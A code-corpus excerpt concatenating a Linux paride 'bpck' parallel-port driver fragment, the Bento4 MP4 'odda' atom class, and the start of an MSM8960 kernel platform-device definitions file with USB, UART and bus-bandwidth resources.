static void bpck_force_spp ( PIA *pi )

/* This fakes the EPP protocol to turn off EPP ... */

{       pi->saved_r0 = r0();
	w0(0xff-pi->unit); w2(4); w0(pi->unit);
	t2(8); t2(8); t2(8);
	t2(2); t2(2);

	w2(0);
	w0(4); w2(9); w2(0);
	w0(0); w2(1); w2(3); w2(0);
	w0(0); w2(9); w2(0);
	w2(0x4c); w0(pi->saved_r0);
}
#define TEST_LEN  16

/*
 * Verify that the adapter works in pi->mode by reading a known test
 * pattern (bytes 1..TEST_LEN) from register 0x13 and counting the
 * mismatches.  Returns the number of bytes that differed, so 0 means
 * the mode is usable.
 */
static int bpck_test_proto( PIA *pi, char * scratch, int verbose )

{	int i, e, l, h, om;
	char buf[TEST_LEN];

	bpck_force_spp(pi);

	switch (pi->mode) {

	case 0: bpck_connect(pi);
		WR(0x13,0x7f);
		w0(0x13); t2(2);
		for(i=0;i<TEST_LEN;i++) {
		    t2(4); l = r1();
		    t2(4); h = r1();
		    buf[i] = j44(l,h);
		}
		bpck_disconnect(pi);
		break;

	case 1: bpck_connect(pi);
		WR(0x13,0x7f);
		w0(0x13); t2(2); t2(0x20);
		for(i=0;i<TEST_LEN;i++) { t2(4); buf[i] = r0(); }
		t2(1); t2(0x20);
		bpck_disconnect(pi);
		break;

	case 2:
	case 3:
	case 4: om = pi->mode;
		/* set up EPP mode via a mode-0 connect first */
		pi->mode = 0;
		bpck_connect(pi);
		WR(7,3);
		WR(4,8);
		bpck_disconnect(pi);
		pi->mode = om;
		bpck_connect(pi);
		w0(0x13); w2(9); w2(1); w0(0); w2(3); w2(0); w2(0xe0);

		switch (pi->mode) {
		  case 2: for (i=0;i<TEST_LEN;i++) buf[i] = r4();
			  break;
		  case 3: for (i=0;i<TEST_LEN/2;i++) ((u16 *)buf)[i] = r4w();
			  break;
		  case 4: for (i=0;i<TEST_LEN/4;i++) ((u32 *)buf)[i] = r4l();
			  break;
		}

		w2(0);
		WR(7,0);
		bpck_disconnect(pi);
		break;

	}

	if (verbose) {
	    printk("%s: bpck: 0x%x unit %d mode %d: ",
		   pi->device,pi->port,pi->unit,pi->mode);
	    for (i=0;i<TEST_LEN;i++) printk("%3d",buf[i]);
	    printk("\n");
	}

	e = 0;
	for (i=0;i<TEST_LEN;i++) if (buf[i] != (i+1)) e++;
	return e;
}
/*
 * Bit-bang the 128-byte on-board EEPROM into @buf (two bytes per
 * iteration of the outer loop).  The transfer is always done in mode 0
 * with an increased delay; the caller's mode and delay are restored
 * before returning.
 */
static void bpck_read_eeprom ( PIA *pi, char * buf )

{       int i, j, k, n, p, v, f, om, od;

	bpck_force_spp(pi);

	om = pi->mode;  od = pi->delay;
	pi->mode = 0; pi->delay = 6;

	bpck_connect(pi);

	n = 0;
	WR(4,0);
	for (i=0;i<64;i++) {
	    WR(6,8);
	    WR(6,0xc);
	    p = 0x100;
	    /* clock out the 9-bit EEPROM address */
	    for (k=0;k<9;k++) {
		f = (((i + 0x180) & p) != 0) * 2;
		WR(6,f+0xc);
		WR(6,f+0xd);
		WR(6,f+0xc);
		p = (p >> 1);
	    }
	    /* clock in two data bytes, MSB first */
	    for (j=0;j<2;j++) {
		v = 0;
		for (k=0;k<8;k++) {
		    WR(6,0xc);
		    WR(6,0xd);
		    WR(6,0xc);
		    f = RR(0);
		    v = 2*v + (f == 0x84);
		}
		buf[2*i+1-j] = v;
	    }
	}
	WR(6,8);
	WR(6,0);
	WR(5,8);

	bpck_disconnect(pi);

	/* restore EPP setup if the caller's mode needs it */
	if (om >= 2) {
		bpck_connect(pi);
		WR(7,3);
		WR(4,8);
		bpck_disconnect(pi);
	}

	pi->mode = om; pi->delay = od;
}
/*
 * Check whether the parallel port supports bidirectional (8-bit) data
 * transfers by writing a pattern and reading it back.  Returns 5 (the
 * number of usable modes) on success, 0 if the port is unusable.
 */
static int bpck_test_port ( PIA *pi ) 	/* check for 8-bit port */

{	int	i, r, m;

	w2(0x2c); i = r0(); w0(255-i); r = r0(); w0(i);
	m = -1;
	if (r == i) m = 2;
	if (r == (255-i)) m = 0;

	w2(0xc); i = r0(); w0(255-i); r = r0(); w0(i);
	if (r != (255-i)) m = -1;

	if (m == 0) { w2(6); w2(0xc); r = r0(); w0(0xaa); w0(r); w0(0xaa); }
	if (m == 2) { w2(0x26); w2(0xc); }

	if (m == -1) return 0;
	return 5;
}
/*
 * Log the adapter identification (serial number from the EEPROM, port,
 * mode and delay).  With DUMP_EEPROM defined and @verbose set, also
 * dump the full 128-byte EEPROM content as printable text.
 */
static void bpck_log_adapter( PIA *pi, char * scratch, int verbose )

{	char	*mode_string[5] = { "4-bit","8-bit","EPP-8",
				    "EPP-16","EPP-32" };

#ifdef DUMP_EEPROM
	int i;
#endif

	bpck_read_eeprom(pi,scratch);

#ifdef DUMP_EEPROM
	if (verbose) {
	   for(i=0;i<128;i++)
		if ((scratch[i] < ' ') || (scratch[i] > '~'))
		    scratch[i] = '.';
	   printk("%s: bpck EEPROM: %64.64s\n",pi->device,scratch);
	   printk("%s:              %64.64s\n",pi->device,&scratch[64]);
	}
#endif

	printk("%s: bpck %s, backpack %8.8s unit %d",
		pi->device,BPCK_VERSION,&scratch[110],pi->unit);
	printk(" at 0x%x, mode %d (%s), delay %d\n",pi->port,
		pi->mode,mode_string[pi->mode],pi->delay);
}
/* Protocol operations table registered with the paride core. */
static struct pi_protocol bpck = {
	.owner		= THIS_MODULE,
	.name		= "bpck",
	.max_mode	= 5,
	.epp_first	= 2,	/* modes 2..4 require EPP hardware */
	.default_delay	= 4,
	.max_units	= 255,
	.write_regr	= bpck_write_regr,
	.read_regr	= bpck_read_regr,
	.write_block	= bpck_write_block,
	.read_block	= bpck_read_block,
	.connect	= bpck_connect,
	.disconnect	= bpck_disconnect,
	.test_port	= bpck_test_port,
	.probe_unit	= bpck_probe_unit,
	.test_proto	= bpck_test_proto,
	.log_adapter	= bpck_log_adapter,
};
/* Module entry point: register the protocol with the paride core. */
static int __init bpck_init(void)
{
	return paride_register(&bpck);
}
/* Module exit point: unregister the protocol. */
static void __exit bpck_exit(void)
{
	paride_unregister(&bpck);
}
MODULE_LICENSE("GPL");
module_init(bpck_init)
module_exit(bpck_exit)
| gpl-2.0 |
xbmcin/XBMCinTC | project/cmake/addons/build/inputstream.smoothstream/lib/libbento4/Core/Ap4OddaAtom.cpp | 4 | 5994 | /*****************************************************************
|
| AP4 - odda Atoms
|
| Copyright 2002-2008 Axiomatic Systems, LLC
|
|
| This file is part of Bento4/AP4 (MP4 Atom Processing Library).
|
| Unless you have obtained Bento4 under a difference license,
| this version of Bento4 is Bento4|GPL.
| Bento4|GPL is free software; you can redistribute it and/or modify
| it under the terms of the GNU General Public License as published by
| the Free Software Foundation; either version 2, or (at your option)
| any later version.
|
| Bento4|GPL is distributed in the hope that it will be useful,
| but WITHOUT ANY WARRANTY; without even the implied warranty of
| MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
| GNU General Public License for more details.
|
| You should have received a copy of the GNU General Public License
| along with Bento4|GPL; see the file COPYING. If not, write to the
| Free Software Foundation, 59 Temple Place - Suite 330, Boston, MA
| 02111-1307, USA.
|
****************************************************************/
/*----------------------------------------------------------------------
| includes
+---------------------------------------------------------------------*/
#include "Ap4Utils.h"
#include "Ap4OddaAtom.h"
/*----------------------------------------------------------------------
| dynamic cast support
+---------------------------------------------------------------------*/
AP4_DEFINE_DYNAMIC_CAST_ANCHOR(AP4_OddaAtom)
/*----------------------------------------------------------------------
| AP4_OddaAtom::Create
+---------------------------------------------------------------------*/
AP4_OddaAtom*
AP4_OddaAtom::Create(AP4_UI64        size,
                     AP4_ByteStream& stream)
{
    // read and validate the full-atom header before constructing
    AP4_UI08 version;
    AP4_UI32 flags;
    if (AP4_FAILED(AP4_Atom::ReadFullHeader(stream, version, flags))) {
        return NULL;
    }
    if (version != 0) {
        // only version 0 of this atom is understood
        return NULL;
    }
    return new AP4_OddaAtom(size, version, flags, stream);
}
/*----------------------------------------------------------------------
| AP4_OddaAtom::AP4_OddaAtom
+---------------------------------------------------------------------*/
// Construct from a serialized stream: reads the 64-bit payload length,
// wraps the payload bytes in a sub-stream (no copy), and leaves the
// source stream positioned just past the payload.
AP4_OddaAtom::AP4_OddaAtom(AP4_UI64        size,
                           AP4_UI08        version,
                           AP4_UI32        flags,
                           AP4_ByteStream& stream) :
    AP4_Atom(AP4_ATOM_TYPE_ODDA, size, true, version, flags)
{
    // data length
    stream.ReadUI64(m_EncryptedDataLength);

    // get the source stream position
    AP4_Position position;
    stream.Tell(position);

    // create a substream to represent the payload
    m_EncryptedPayload = new AP4_SubStream(stream, position, m_EncryptedDataLength);

    // seek to the end
    stream.Seek(position+m_EncryptedDataLength);
}
/*----------------------------------------------------------------------
| AP4_OddaAtom::AP4_OddaAtom
+---------------------------------------------------------------------*/
// Construct directly from an encrypted payload stream; the atom takes a
// reference on the stream and computes its own size from the payload.
AP4_OddaAtom::AP4_OddaAtom(AP4_ByteStream& encrypted_payload) :
    AP4_Atom(AP4_ATOM_TYPE_ODDA, 0, true, 0, 0)
{
    // encrypted data length
    encrypted_payload.GetSize(m_EncryptedDataLength);

    // update our size (64-bit full-atom header + 8-byte length field + payload)
    SetSize(AP4_FULL_ATOM_HEADER_SIZE_64+8+m_EncryptedDataLength, true);

    // keep a reference to the encrypted payload
    m_EncryptedPayload = &encrypted_payload;
    m_EncryptedPayload->AddReference();
}
/*----------------------------------------------------------------------
| AP4_OddaAtom::~AP4_OddaAtom
+---------------------------------------------------------------------*/
// Release the reference held on the payload stream, if any.
AP4_OddaAtom::~AP4_OddaAtom()
{
    if (m_EncryptedPayload) m_EncryptedPayload->Release();
}
/*----------------------------------------------------------------------
| AP4_OddaAtom::SetEncryptedPayload
+---------------------------------------------------------------------*/
// Replace the payload with @stream, taking @length bytes as the payload
// size.  Releases the previous payload reference, updates the atom size
// and notifies the parent of the size change.  Always returns AP4_SUCCESS.
AP4_Result
AP4_OddaAtom::SetEncryptedPayload(AP4_ByteStream& stream, AP4_LargeSize length)
{
    // keep a reference to the stream
    if (m_EncryptedPayload) {
        m_EncryptedPayload->Release();
    }
    m_EncryptedPayload = &stream;
    m_EncryptedPayload->AddReference();

    // update the size
    m_EncryptedDataLength = length;
    SetSize(AP4_FULL_ATOM_HEADER_SIZE_64 + 8 + length, true);
    if (m_Parent) m_Parent->OnChildChanged(this);

    return AP4_SUCCESS;
}
/*----------------------------------------------------------------------
| AP4_OddaAtom::SetEncryptedPayload
+---------------------------------------------------------------------*/
// Convenience overload: use the stream's own size as the payload length.
AP4_Result
AP4_OddaAtom::SetEncryptedPayload(AP4_ByteStream& stream)
{
    AP4_LargeSize payload_size;
    AP4_Result status = stream.GetSize(payload_size);
    if (AP4_FAILED(status)) {
        return status;
    }
    return SetEncryptedPayload(stream, payload_size);
}
/*----------------------------------------------------------------------
| AP4_OddaAtom::WriteFields
+---------------------------------------------------------------------*/
// Serialize the atom body: the 64-bit payload length followed by the
// payload bytes copied from the payload stream (rewound first).
AP4_Result
AP4_OddaAtom::WriteFields(AP4_ByteStream& stream)
{
    // write the content type
    AP4_CHECK(stream.WriteUI64(m_EncryptedDataLength));

    // check that we have a source stream
    // and a normal size
    if (m_EncryptedPayload == NULL || GetSize() < 8) {
        return AP4_FAILURE;
    }

    // rewind the encrypted stream
    AP4_CHECK(m_EncryptedPayload->Seek(0));

    // copy the encrypted stream to the output
    AP4_CHECK(m_EncryptedPayload->CopyTo(stream, m_EncryptedDataLength));

    return AP4_SUCCESS;
}
/*----------------------------------------------------------------------
| AP4_OddaAtom::InspectFields
+---------------------------------------------------------------------*/
// Report the payload length to the inspector (truncated to 32 bits).
AP4_Result
AP4_OddaAtom::InspectFields(AP4_AtomInspector& inspector)
{
    inspector.AddField("encrypted_data_length", (AP4_UI32)m_EncryptedDataLength);

    return AP4_SUCCESS;
}
| gpl-2.0 |
jorik041/Unleashed-Kernel-Series | arch/arm/mach-msm/devices-8960.c | 4 | 107054 | /* Copyright (c) 2011-2013, The Linux Foundation. All rights reserved.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 and
* only version 2 as published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
*/
#include <linux/kernel.h>
#include <linux/list.h>
#include <linux/platform_device.h>
#include <linux/msm_rotator.h>
#include <linux/msm_ion.h>
#include <linux/gpio.h>
#include <linux/coresight.h>
#include <asm/clkdev.h>
#include <mach/kgsl.h>
#include <mach/irqs-8960.h>
#include <mach/dma.h>
#include <linux/dma-mapping.h>
#include <mach/board.h>
#include <mach/msm_iomap.h>
#include <mach/msm_hsusb.h>
#include <mach/msm_sps.h>
#include <mach/rpm.h>
#include <mach/msm_bus_board.h>
#include <mach/msm_memtypes.h>
#include <mach/msm_smd.h>
#include <mach/msm_dcvs.h>
#include <mach/msm_rtb.h>
#include <mach/msm_cache_dump.h>
#include <mach/clk-provider.h>
#include <sound/msm-dai-q6.h>
#include <sound/apr_audio.h>
#include <mach/msm_tsif.h>
#include <mach/msm_serial_hs_lite.h>
#include "clock.h"
#include "devices.h"
#include "devices-msm8x60.h"
#include "footswitch.h"
#include "msm_watchdog.h"
#include "rpm_log.h"
#include "rpm_stats.h"
#include "pil-q6v4.h"
#include "scm-pas.h"
#include <mach/msm_dcvs.h>
#include <mach/iommu_domains.h>
#include <mach/socinfo.h>
#include "pm.h"
#ifdef CONFIG_MSM_MPM
#include <mach/mpm.h>
#endif
#ifdef CONFIG_MSM_DSPS
#include <mach/msm_dsps.h>
#endif
/* Address of GSBI blocks */
#define MSM_GSBI1_PHYS 0x16000000
#define MSM_GSBI2_PHYS 0x16100000
#define MSM_GSBI3_PHYS 0x16200000
#define MSM_GSBI4_PHYS 0x16300000
#define MSM_GSBI5_PHYS 0x16400000
#define MSM_GSBI6_PHYS 0x16500000
#define MSM_GSBI7_PHYS 0x16600000
#define MSM_GSBI8_PHYS 0x1A000000
#define MSM_GSBI9_PHYS 0x1A100000
#define MSM_GSBI10_PHYS 0x1A200000
#define MSM_GSBI11_PHYS 0x12440000
#define MSM_GSBI12_PHYS 0x12480000
#define MSM_UART2DM_PHYS (MSM_GSBI2_PHYS + 0x40000)
#define MSM_UART5DM_PHYS (MSM_GSBI5_PHYS + 0x40000)
#define MSM_UART6DM_PHYS (MSM_GSBI6_PHYS + 0x40000)
#define MSM_UART8DM_PHYS (MSM_GSBI8_PHYS + 0x40000)
#define MSM_UART9DM_PHYS (MSM_GSBI9_PHYS + 0x40000)
/* GSBI QUP devices */
#define MSM_GSBI1_QUP_PHYS (MSM_GSBI1_PHYS + 0x80000)
#define MSM_GSBI2_QUP_PHYS (MSM_GSBI2_PHYS + 0x80000)
#define MSM_GSBI3_QUP_PHYS (MSM_GSBI3_PHYS + 0x80000)
#define MSM_GSBI4_QUP_PHYS (MSM_GSBI4_PHYS + 0x80000)
#define MSM_GSBI5_QUP_PHYS (MSM_GSBI5_PHYS + 0x80000)
#define MSM_GSBI6_QUP_PHYS (MSM_GSBI6_PHYS + 0x80000)
#define MSM_GSBI7_QUP_PHYS (MSM_GSBI7_PHYS + 0x80000)
#define MSM_GSBI8_QUP_PHYS (MSM_GSBI8_PHYS + 0x80000)
#define MSM_GSBI9_QUP_PHYS (MSM_GSBI9_PHYS + 0x80000)
#define MSM_GSBI10_QUP_PHYS (MSM_GSBI10_PHYS + 0x80000)
#define MSM_GSBI11_QUP_PHYS (MSM_GSBI11_PHYS + 0x20000)
#define MSM_GSBI12_QUP_PHYS (MSM_GSBI12_PHYS + 0x20000)
#define MSM_QUP_SIZE SZ_4K
#define MSM_PMIC1_SSBI_CMD_PHYS 0x00500000
#define MSM_PMIC2_SSBI_CMD_PHYS 0x00C00000
#define MSM_PMIC_SSBI_SIZE SZ_4K
#define MSM8960_HSUSB_PHYS 0x12500000
#define MSM8960_HSUSB_SIZE SZ_4K
#define MSM8960_RPM_MASTER_STATS_BASE 0x10BB00
#define MSM8960_PC_CNTR_PHYS (MSM8960_IMEM_PHYS + 0x664)
#define MSM8960_PC_CNTR_SIZE 0x40
static struct resource msm8960_resources_pccntr[] = {
	{
		/*
		 * struct resource ranges are inclusive, so .end must be
		 * start + size - 1; the original value overshot by one
		 * byte (compare resources_hsusb_host below).
		 */
		.start	= MSM8960_PC_CNTR_PHYS,
		.end	= MSM8960_PC_CNTR_PHYS + MSM8960_PC_CNTR_SIZE - 1,
		.flags	= IORESOURCE_MEM,
	},
};

/* Power-collapse counter device; counters live in IMEM. */
struct platform_device msm8960_pc_cntr = {
	.name		= "pc-cntr",
	.id		= -1,
	.num_resources	= ARRAY_SIZE(msm8960_resources_pccntr),
	.resource	= msm8960_resources_pccntr,
};
static struct resource resources_otg[] = {
	{
		/*
		 * Resource ranges are inclusive: end = start + size - 1.
		 * The original end overshot by one byte (compare
		 * resources_hsusb_host below).
		 */
		.start	= MSM8960_HSUSB_PHYS,
		.end	= MSM8960_HSUSB_PHYS + MSM8960_HSUSB_SIZE - 1,
		.flags	= IORESOURCE_MEM,
	},
	{
		.start	= USB1_HS_IRQ,
		.end	= USB1_HS_IRQ,
		.flags	= IORESOURCE_IRQ,
	},
};

/* USB OTG controller device. */
struct platform_device msm8960_device_otg = {
	.name		= "msm_otg",
	.id		= -1,
	.num_resources	= ARRAY_SIZE(resources_otg),
	.resource	= resources_otg,
	.dev		= {
		.coherent_dma_mask	= 0xffffffff,
	},
};
static struct resource resources_hsusb[] = {
	{
		/*
		 * Resource ranges are inclusive: end = start + size - 1.
		 * The original end overshot by one byte (compare
		 * resources_hsusb_host below).
		 */
		.start	= MSM8960_HSUSB_PHYS,
		.end	= MSM8960_HSUSB_PHYS + MSM8960_HSUSB_SIZE - 1,
		.flags	= IORESOURCE_MEM,
	},
	{
		.start	= USB1_HS_IRQ,
		.end	= USB1_HS_IRQ,
		.flags	= IORESOURCE_IRQ,
	},
};

/* USB peripheral (gadget) controller device; shares the HS-USB block. */
struct platform_device msm8960_device_gadget_peripheral = {
	.name		= "msm_hsusb",
	.id		= -1,
	.num_resources	= ARRAY_SIZE(resources_hsusb),
	.resource	= resources_hsusb,
	.dev		= {
		.coherent_dma_mask	= 0xffffffff,
	},
};
static struct resource resources_hsusb_host[] = {
	{
		.start	= MSM8960_HSUSB_PHYS,
		.end	= MSM8960_HSUSB_PHYS + MSM8960_HSUSB_SIZE - 1,
		.flags	= IORESOURCE_MEM,
	},
	{
		.start	= USB1_HS_IRQ,
		.end	= USB1_HS_IRQ,
		.flags	= IORESOURCE_IRQ,
	},
};

/* 32-bit streaming DMA mask shared by the USB host and HSIC devices. */
static u64 dma_mask = DMA_BIT_MASK(32);

/* USB host controller device; shares the HS-USB register block. */
struct platform_device msm_device_hsusb_host = {
	.name		= "msm_hsusb_host",
	.id		= -1,
	.num_resources	= ARRAY_SIZE(resources_hsusb_host),
	.resource	= resources_hsusb_host,
	.dev		= {
		.dma_mask		= &dma_mask,
		.coherent_dma_mask	= 0xffffffff,
	},
};
static struct resource resources_hsic_host[] = {
	{
		.start	= 0x12520000,
		.end	= 0x12520000 + SZ_4K - 1,
		.flags	= IORESOURCE_MEM,
	},
	{
		.start	= USB_HSIC_IRQ,
		.end	= USB_HSIC_IRQ,
		.flags	= IORESOURCE_IRQ,
	},
	{
		/* GPIO 69 signals peripheral status changes */
		.start	= MSM_GPIO_TO_INT(69),
		.end	= MSM_GPIO_TO_INT(69),
		.name	= "peripheral_status_irq",
		.flags	= IORESOURCE_IRQ,
	},
};

/* HSIC (High-Speed Inter-Chip) USB host controller device. */
struct platform_device msm_device_hsic_host = {
	.name		= "msm_hsic_host",
	.id		= -1,
	.num_resources	= ARRAY_SIZE(resources_hsic_host),
	.resource	= resources_hsic_host,
	.dev		= {
		.dma_mask		= &dma_mask,
		.coherent_dma_mask	= DMA_BIT_MASK(32),
	},
};
/* CPU clock scaling driver stubs for MSM8960 and MSM8960AB. */
struct platform_device msm8960_device_acpuclk = {
	.name		= "acpuclk-8960",
	.id		= -1,
};

struct platform_device msm8960ab_device_acpuclk = {
	.name		= "acpuclk-8960ab",
	.id		= -1,
};
/* TrustZone log buffer lives in shared IMEM at this fixed address. */
#define SHARED_IMEM_TZ_BASE 0x2a03f720

static struct resource tzlog_resources[] = {
	{
		.start = SHARED_IMEM_TZ_BASE,
		.end = SHARED_IMEM_TZ_BASE + SZ_4K - 1,
		.flags = IORESOURCE_MEM,
	},
};

struct platform_device msm_device_tz_log = {
	.name		= "tz_log",
	.id		= 0,
	.num_resources	= ARRAY_SIZE(tzlog_resources),
	.resource	= tzlog_resources,
};
/* GSBI2 configured as a low-speed (lite) UART. */
static struct resource resources_uart_gsbi2[] = {
	{
		.start	= MSM8960_GSBI2_UARTDM_IRQ,
		.end	= MSM8960_GSBI2_UARTDM_IRQ,
		.flags	= IORESOURCE_IRQ,
	},
	{
		.start	= MSM_UART2DM_PHYS,
		.end	= MSM_UART2DM_PHYS + PAGE_SIZE - 1,
		.name	= "uartdm_resource",
		.flags	= IORESOURCE_MEM,
	},
	{
		.start	= MSM_GSBI2_PHYS,
		.end	= MSM_GSBI2_PHYS + PAGE_SIZE - 1,
		.name	= "gsbi_resource",
		.flags	= IORESOURCE_MEM,
	},
};

struct platform_device msm8960_device_uart_gsbi2 = {
	.name	= "msm_serial_hsl",
	.id	= 0,
	.num_resources	= ARRAY_SIZE(resources_uart_gsbi2),
	.resource	= resources_uart_gsbi2,
};
/* GSBI 6 used into UARTDM Mode */
static struct resource msm_uart_dm6_resources[] = {
	{
		.start	= MSM_UART6DM_PHYS,
		.end	= MSM_UART6DM_PHYS + PAGE_SIZE - 1,
		.name	= "uartdm_resource",
		.flags	= IORESOURCE_MEM,
	},
	{
		.start	= GSBI6_UARTDM_IRQ,
		.end	= GSBI6_UARTDM_IRQ,
		.flags	= IORESOURCE_IRQ,
	},
	{
		/* only the first GSBI control word is mapped here */
		.start	= MSM_GSBI6_PHYS,
		.end	= MSM_GSBI6_PHYS + 4 - 1,
		.name	= "gsbi_resource",
		.flags	= IORESOURCE_MEM,
	},
	{
		.start	= DMOV_HSUART_GSBI6_TX_CHAN,
		.end	= DMOV_HSUART_GSBI6_RX_CHAN,
		.name	= "uartdm_channels",
		.flags	= IORESOURCE_DMA,
	},
	{
		.start	= DMOV_HSUART_GSBI6_TX_CRCI,
		.end	= DMOV_HSUART_GSBI6_RX_CRCI,
		.name	= "uartdm_crci",
		.flags	= IORESOURCE_DMA,
	},
};

static u64 msm_uart_dm6_dma_mask = DMA_BIT_MASK(32);

/* High-speed UART on GSBI6 (DMA capable). */
struct platform_device msm_device_uart_dm6 = {
	.name	= "msm_serial_hs",
	.id	= 0,
	.num_resources	= ARRAY_SIZE(msm_uart_dm6_resources),
	.resource	= msm_uart_dm6_resources,
	.dev	= {
		.dma_mask		= &msm_uart_dm6_dma_mask,
		.coherent_dma_mask	= DMA_BIT_MASK(32),
	},
};
/* GSBI 8 used into UARTDM Mode */
static struct resource msm_uart_dm8_resources[] = {
	{
		.start	= MSM_UART8DM_PHYS,
		.end	= MSM_UART8DM_PHYS + PAGE_SIZE - 1,
		.name	= "uartdm_resource",
		.flags	= IORESOURCE_MEM,
	},
	{
		.start	= GSBI8_UARTDM_IRQ,
		.end	= GSBI8_UARTDM_IRQ,
		.flags	= IORESOURCE_IRQ,
	},
	{
		/* only the first GSBI control word is mapped here */
		.start	= MSM_GSBI8_PHYS,
		.end	= MSM_GSBI8_PHYS + 4 - 1,
		.name	= "gsbi_resource",
		.flags	= IORESOURCE_MEM,
	},
	{
		.start	= DMOV_HSUART_GSBI8_TX_CHAN,
		.end	= DMOV_HSUART_GSBI8_RX_CHAN,
		.name	= "uartdm_channels",
		.flags	= IORESOURCE_DMA,
	},
	{
		.start	= DMOV_HSUART_GSBI8_TX_CRCI,
		.end	= DMOV_HSUART_GSBI8_RX_CRCI,
		.name	= "uartdm_crci",
		.flags	= IORESOURCE_DMA,
	},
};

static u64 msm_uart_dm8_dma_mask = DMA_BIT_MASK(32);

/* High-speed UART on GSBI8 (DMA capable). */
struct platform_device msm_device_uart_dm8 = {
	.name	= "msm_serial_hs",
	.id	= 2,
	.num_resources	= ARRAY_SIZE(msm_uart_dm8_resources),
	.resource	= msm_uart_dm8_resources,
	.dev	= {
		.dma_mask		= &msm_uart_dm8_dma_mask,
		.coherent_dma_mask	= DMA_BIT_MASK(32),
	},
};
/*
 * GSBI 9 used into UARTDM Mode
 * For 8960 Fusion 2.2 Primary IPC
 */
static struct resource msm_uart_dm9_resources[] = {
	{
		.start	= MSM_UART9DM_PHYS,
		.end	= MSM_UART9DM_PHYS + PAGE_SIZE - 1,
		.name	= "uartdm_resource",
		.flags	= IORESOURCE_MEM,
	},
	{
		.start	= GSBI9_UARTDM_IRQ,
		.end	= GSBI9_UARTDM_IRQ,
		.flags	= IORESOURCE_IRQ,
	},
	{
		/* only the first GSBI control word is mapped here */
		.start	= MSM_GSBI9_PHYS,
		.end	= MSM_GSBI9_PHYS + 4 - 1,
		.name	= "gsbi_resource",
		.flags	= IORESOURCE_MEM,
	},
	{
		.start	= DMOV_HSUART_GSBI9_TX_CHAN,
		.end	= DMOV_HSUART_GSBI9_RX_CHAN,
		.name	= "uartdm_channels",
		.flags	= IORESOURCE_DMA,
	},
	{
		.start	= DMOV_HSUART_GSBI9_TX_CRCI,
		.end	= DMOV_HSUART_GSBI9_RX_CRCI,
		.name	= "uartdm_crci",
		.flags	= IORESOURCE_DMA,
	},
};

static u64 msm_uart_dm9_dma_mask = DMA_BIT_MASK(32);

/* High-speed UART on GSBI9 (DMA capable). */
struct platform_device msm_device_uart_dm9 = {
	.name	= "msm_serial_hs",
	.id	= 1,
	.num_resources	= ARRAY_SIZE(msm_uart_dm9_resources),
	.resource	= msm_uart_dm9_resources,
	.dev	= {
		.dma_mask		= &msm_uart_dm9_dma_mask,
		.coherent_dma_mask	= DMA_BIT_MASK(32),
	},
};
/* GSBI5 configured as a low-speed (lite) UART. */
static struct resource resources_uart_gsbi5[] = {
	{
		.start	= GSBI5_UARTDM_IRQ,
		.end	= GSBI5_UARTDM_IRQ,
		.flags	= IORESOURCE_IRQ,
	},
	{
		.start	= MSM_UART5DM_PHYS,
		.end	= MSM_UART5DM_PHYS + PAGE_SIZE - 1,
		.name	= "uartdm_resource",
		.flags	= IORESOURCE_MEM,
	},
	{
		.start	= MSM_GSBI5_PHYS,
		.end	= MSM_GSBI5_PHYS + PAGE_SIZE - 1,
		.name	= "gsbi_resource",
		.flags	= IORESOURCE_MEM,
	},
};

struct platform_device msm8960_device_uart_gsbi5 = {
	.name	= "msm_serial_hsl",
	.id	= 0,
	.num_resources	= ARRAY_SIZE(resources_uart_gsbi5),
	.resource	= resources_uart_gsbi5,
};
/* GSBI8 configured as a low-speed (lite) UART on line 0. */
static struct msm_serial_hslite_platform_data uart_gsbi8_pdata = {
	.line		= 0,
};

static struct resource resources_uart_gsbi8[] = {
	{
		.start	= GSBI8_UARTDM_IRQ,
		.end	= GSBI8_UARTDM_IRQ,
		.flags	= IORESOURCE_IRQ,
	},
	{
		.start	= MSM_UART8DM_PHYS,
		.end	= MSM_UART8DM_PHYS + PAGE_SIZE - 1,
		.name	= "uartdm_resource",
		.flags	= IORESOURCE_MEM,
	},
	{
		.start	= MSM_GSBI8_PHYS,
		.end	= MSM_GSBI8_PHYS + PAGE_SIZE - 1,
		.name	= "gsbi_resource",
		.flags	= IORESOURCE_MEM,
	},
};

struct platform_device msm8960_device_uart_gsbi8 = {
	.name	= "msm_serial_hsl",
	.id	= 1,
	.num_resources	= ARRAY_SIZE(resources_uart_gsbi8),
	.resource	= resources_uart_gsbi8,
	.dev.platform_data = &uart_gsbi8_pdata,
};
/* MSM Video core device */
#ifdef CONFIG_MSM_BUS_SCALING
/*
 * Bus-bandwidth vote tables for the video codec, one table per use case
 * (idle/init, VGA/720p/1080p encode and decode).  Each table has four
 * entries: the two HD codec AXI ports and two CPU (AMPSS) entries.
 * ab/ib appear to be the arbitrated and instantaneous bandwidth votes in
 * bytes/sec per the msm_bus convention -- confirm against msm_bus_board.h.
 */

/* no bandwidth requested while the codec is idle */
static struct msm_bus_vectors vidc_init_vectors[] = {
	{
		.src = MSM_BUS_MASTER_HD_CODEC_PORT0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 0,
		.ib = 0,
	},
	{
		.src = MSM_BUS_MASTER_HD_CODEC_PORT1,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 0,
		.ib = 0,
	},
	{
		.src = MSM_BUS_MASTER_AMPSS_M0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 0,
		.ib = 0,
	},
	{
		.src = MSM_BUS_MASTER_AMPSS_M0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 0,
		.ib = 0,
	},
};

/* VGA encode */
static struct msm_bus_vectors vidc_venc_vga_vectors[] = {
	{
		.src = MSM_BUS_MASTER_HD_CODEC_PORT0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 54525952,
		.ib = 436207616,
	},
	{
		.src = MSM_BUS_MASTER_HD_CODEC_PORT1,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 72351744,
		.ib = 289406976,
	},
	{
		.src = MSM_BUS_MASTER_AMPSS_M0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 500000,
		.ib = 1000000,
	},
	{
		.src = MSM_BUS_MASTER_AMPSS_M0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 500000,
		.ib = 1000000,
	},
};

